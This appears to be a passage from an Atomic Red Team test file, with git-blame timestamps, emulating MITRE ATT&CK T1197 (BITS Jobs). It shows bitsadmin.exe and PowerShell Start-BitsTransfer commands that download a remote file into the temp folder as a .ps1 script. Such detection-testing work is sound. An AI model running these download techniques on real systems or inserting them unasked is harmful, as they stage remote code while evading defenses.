2018-04-22 18:38:47 +10:00
|
|
|
## BITS Jobs
|
|
|
|
|
|
|
|
|
|
MITRE ATT&CK Technique: [T1197](https://attack.mitre.org/wiki/Technique/T1197)
|
|
|
|
|
|
2018-04-15 17:54:49 -07:00
|
|
|
### bitsadmin.exe
|
2017-10-11 10:35:17 -07:00
|
|
|
|
2018-04-22 18:38:47 +10:00
|
|
|
bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|
|
|
|
|
|
|
|
|
|
### PowerShell
|
|
|
|
|
|
|
|
|
|
Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Execution/Bitsadmin.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1
|